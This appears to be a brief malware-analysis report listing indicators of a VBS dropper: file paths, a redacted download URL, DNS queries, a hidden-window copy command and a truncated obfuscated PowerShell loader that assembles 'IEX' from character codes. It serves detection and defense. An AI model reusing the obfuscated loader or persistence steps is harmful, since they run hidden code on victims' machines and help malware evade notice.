Technical Information
- <SYSTEM32>\tasks\host
- %LOCALAPPDATA%\microsoft\<File name>.vbs
- http://re#####ismbrasil.com/janeiro/revenge33333portporcento.jpg
- DNS ASK google.com
- DNS ASK re#####ismbrasil.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = [char]73;$a2=[char]69;$a3=[char]88;sal K $a$a2$a3;$ASIOjariqEqfa5s4fd6as5=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,... (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft" /Y (with hidden window)